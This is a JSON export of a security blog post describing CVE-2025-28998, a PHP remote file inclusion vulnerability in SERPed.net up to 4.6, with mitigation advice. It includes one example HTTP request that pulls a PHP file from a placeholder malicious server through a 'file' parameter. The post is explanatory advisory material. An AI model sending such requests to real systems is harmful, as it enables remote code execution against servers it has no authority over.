{"id":57650,"date":"2025-07-05T18:34:21","date_gmt":"2025-07-05T18:34:21","guid":{"rendered":""},"modified":"2025-10-02T23:37:22","modified_gmt":"2025-10-03T05:37:22","slug":"cve-2025-28998-remote-file-inclusion-vulnerability-in-serped-net-php-program","status":"publish","type":"post","link":"https:\/\/www.ameeba.com\/blog\/cve-2025-28998-remote-file-inclusion-vulnerability-in-serped-net-php-program\/","title":{"rendered":"<strong>CVE-2025-28998: Remote File Inclusion Vulnerability in SERPed.net PHP Program<\/strong>"},"content":{"rendered":"<p><strong>Overview<\/strong><\/p>\n<p>The CVE-2025-28998 is a serious security vulnerability detected in the SERPed.net PHP program that may potentially lead to system compromise or data leakage. This vulnerability is based on improper control of filename for Include\/Require statement in PHP program, also known as &#8216;PHP Remote File Inclusion&#8217;. This flaw affects a wide range of SERPed.net versions, specifically from n\/a through 4.6, and poses a significant threat to the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2021-26383-critical-vulnerability-in-amd-tee-puts-system-integrity-and-data-availability-in-jeopardy\/\"  data-wpil-monitor-id=\"88072\">integrity and confidentiality of the affected systems<\/a>, making this issue crucial to address.<\/p>\n<p><strong>Vulnerability Summary<\/strong><\/p>\n<p>CVE ID: CVE-2025-28998<br \/>\nSeverity: High (8.1 CVSS score)<br \/>\nAttack Vector: Network<br \/>\nPrivileges Required: None<br \/>\nUser Interaction: None<br \/>\nImpact: <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-3090-unauthenticated-remote-attack-leading-to-potential-data-leakage-and-system-compromise\/\"  data-wpil-monitor-id=\"64599\">System compromise and potential data leakage<\/a><\/p>\n<p><strong>Affected Products<\/strong><\/p><div id=\"ameeb-1104484862\" class=\"ameeb-content-2 ameeb-entity-placement\"><div style=\"border-left: 4px solid #555; padding-left: 20px; margin: 48px 0; font-family: Roboto, sans-serif; color: #ffffff; line-height: 1.6; max-width: 700px;\">\r\n  <h2 style=\"margin-top: 0; font-size: 20px; font-weight: 600; display: flex; align-items: center;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"display: inline-flex; align-items: center; margin-right: 8px;\">\r\n      <img decoding=\"async\" src=\"https:\/\/www.ameeba.com\/blog\/wp-content\/uploads\/2025\/10\/Best-App-icon-Ameeba.png\" alt=\"Ameeba Chat Icon\" style=\"width: 40px; height: 40px;\" \/>\r\n    <\/a>\r\n    A new way to communicate\r\n  <\/h2>\r\n\r\n  <p style=\"margin-bottom: 12px;\">\r\n    Ameeba Chat is built on encrypted identity, not personal profiles.\r\n  <\/p>\r\n\r\n  <p style=\"margin-bottom: 16px;\">\r\n    Message, call, share files, and coordinate with identities kept separate.\r\n  <\/p>\r\n\r\n  <ul style=\"list-style: none; padding-left: 0; margin-bottom: 20px;\">\r\n    <li>\u2022 Encrypted identity<\/li>\r\n    <li>\u2022 Ameeba Chat authenticates access<\/li>\r\n    <li>\u2022 Aliases and categories<\/li>\r\n    <li>\u2022 End-to-end encrypted chat, calls, and files<\/li>\r\n    <li>\u2022 Secure notes for sensitive information<\/li>\r\n  <\/ul>\r\n\r\n  <p style=\"font-style: italic; font-weight: 600; margin-bottom: 24px;\">\r\n    Private communication, rethought.\r\n  <\/p>\r\n\r\n  <div style=\"display: flex; flex-wrap: wrap; gap: 12px;\">\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\/download\" style=\"background-color: #ffffff; color: #000000; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Download Ameeba Chat<\/a>\r\n    <a href=\"https:\/\/www.ameeba.com\/chat\" style=\"border: 1px solid #ffffff; color: #ffffff; padding: 10px 20px; text-decoration: none; border-radius: 6px; font-weight: 500;\">Learn More<\/a>\r\n  <\/div>\r\n<\/div>\r\n<\/div>\n<p>Product | Affected Versions<\/p>\n<p>SERPed.net | n\/a &#8211; 4.6<\/p>\n<p><strong>How the Exploit Works<\/strong><\/p>\n<p>The exploit works by taking advantage of the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-47993-improper-access-control-vulnerability-in-microsoft-pc-manager\/\"  data-wpil-monitor-id=\"77513\">improper control<\/a> of filenames in the PHP program&#8217;s Include\/Require statement. It <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-20281-critical-vulnerability-in-cisco-ise-and-ise-pic-apis-allows-remote-code-execution\/\"  data-wpil-monitor-id=\"64598\">allows an attacker to include a remote<\/a> file from an external server, which gets executed in the context of the application. This allows the attacker to execute arbitrary code, <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-20599-unauthorized-access-to-crypto-co-processor-registers-in-asp-leading-to-potential-system-compromise\/\"  data-wpil-monitor-id=\"64228\">potentially leading to full system<\/a> compromise.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p><div id=\"ameeb-3402902476\" class=\"ameeb-content ameeb-entity-placement\"><div class=\"poptin-embedded\" data-id=\"f6b387694f681\"><\/div>\r\n\r\n\r\n\r\n\r\n\r\n<\/div>\n<p>Below is a conceptual example of how this vulnerability might be exploited. This HTTP request demonstrates how a malicious payload in the form of a remote <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-6426-executable-file-warning-vulnerability-in-firefox-for-macos\/\"  data-wpil-monitor-id=\"64290\">file could be included and executed<\/a> on the server:<\/p>\n<pre><code class=\"\" data-line=\"\">GET \/vulnerable_page.php?file=http:\/\/malicious_server\/malicious_file.php HTTP\/1.1\nHost: target.example.com<\/code><\/pre>\n<p>In this example, `vulnerable_page.php` is the PHP page that <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-52890-critical-acl-bypass-vulnerability-in-incus-system-container-and-virtual-machine-manager\/\"  data-wpil-monitor-id=\"64738\">contains the vulnerable<\/a> Include\/Require statement. The `file` parameter is <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-48466-remote-manipulation-of-digital-outputs-via-modbus-tcp-packets\/\"  data-wpil-monitor-id=\"64276\">manipulated to include a remote<\/a> file (`malicious_file.php`) from a malicious server (`malicious_server`). When the request is processed, the malicious <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-20282-unauthenticated-file-upload-and-execution-vulnerability-in-cisco-ise-and-ise-pic\/\"  data-wpil-monitor-id=\"64481\">file is included and executed<\/a> on the server.<\/p>\n<p><strong>Mitigation Guidance<\/strong><\/p>\n<p>To mitigate the vulnerability, the immediate recommendation is to apply the vendor-supplied patch. In the event that a patch isn&#8217;t available, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation. However, these <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-5310-remote-code-execution-vulnerability-in-dover-fueling-solutions-progauge-maglink-lx-consoles\/\"  data-wpil-monitor-id=\"65519\">solutions do not completely resolve the vulnerability<\/a> but rather add an additional layer of security to the system. It is strongly recommended to apply the vendor patch as soon as it becomes available to ensure the integrity and confidentiality of your <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-6435-firefox-vulnerability-leading-to-potential-system-compromise-and-data-leakage\/\"  data-wpil-monitor-id=\"65520\">systems and data<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview The CVE-2025-28998 is a serious security vulnerability detected in the SERPed.net PHP program that may potentially lead to system compromise or data leakage. This vulnerability is based on improper control of filename for Include\/Require statement in PHP program, also known as &#8216;PHP Remote File Inclusion&#8217;. This flaw affects a wide range of SERPed.net versions, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"footnotes":""},"categories":[1],"tags":[],"vendor":[],"product":[],"attack_vector":[],"asset_type":[],"severity":[],"exploit_status":[],"class_list":["post-57650","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/57650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/comments?post=57650"}],"version-history":[{"count":9,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/57650\/revisions"}],"predecessor-version":[{"id":80886,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/posts\/57650\/revisions\/80886"}],"wp:attachment":[{"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/media?parent=57650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/categories?post=57650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/tags?post=57650"},{"taxonomy":"vendor","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/vendor?post=57650"},{"taxonomy":"product","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/product?post=57650"},{"taxonomy":"attack_vector","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/attack_vector?post=57650"},{"taxonomy":"asset_type","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/asset_type?post=57650"},{"taxonomy":"severity","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/severity?post=57650"},{"taxonomy":"exploit_status","embeddable":true,"href":"https:\/\/www.ameeba.com\/blog\/wp-json\/wp\/v2\/exploit_status?post=57650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}